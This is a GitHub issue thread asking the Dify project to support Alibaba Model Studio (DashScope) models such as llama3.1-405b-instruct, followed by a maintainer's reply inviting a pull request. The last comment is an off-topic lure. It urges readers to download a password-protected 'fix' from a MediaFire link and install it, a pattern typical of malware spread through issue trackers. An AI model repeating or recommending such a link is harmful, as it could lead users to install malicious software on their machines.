### ISSUE TITLE
Support for Customizable Models or Integration of Ali model-studioe as a Model Provider

### ISSUE THREAD

**Issue by Fan-SJ** [langgenius/dify#7697]
### Self Checks

- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### 1. Is this request related to a challenge you're experiencing? Tell me about your story.

Yes, I am currently facing a challenge with integrating a specific model, llama3.1-405b-instruct, provided by Ali.

## Is this request related to a challenge you are facing?

Yes, I am currently facing a challenge with integrating a specific model, llama3.1-405b-instruct, provided by Ali.

## What is the feature you'd like to see?

I would like to see either the addition of a new model provider, ali dashcope, to support many of the models provided by Aliyun, or an enhancement to the tongyi model to support customization. I personally believe the latter option would be more suitable.

## How will this feature improve your workflow / experience?

This feature will significantly improve my workflow and user experience by providing access to a wider range of models, especially those that are more suited to my specific needs. This will ultimately lead to better performance of my applications.

## Additional Context or Comments

Here is a link to the specific model I am interested in: [API Details of Llama LLM](https://help.aliyun.com/zh/model-studio/developer-reference/api-details-of-llama-llm?spm=a2c4g.11186623.0.0.34f75941P3bvMf)

### 3. Can you help us with this feature?

- [ ] I am interested in contributing to this feature.

**Comment by crazywoola** [comment]
You could open a pr for this if you are interested in this model provider. :)

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
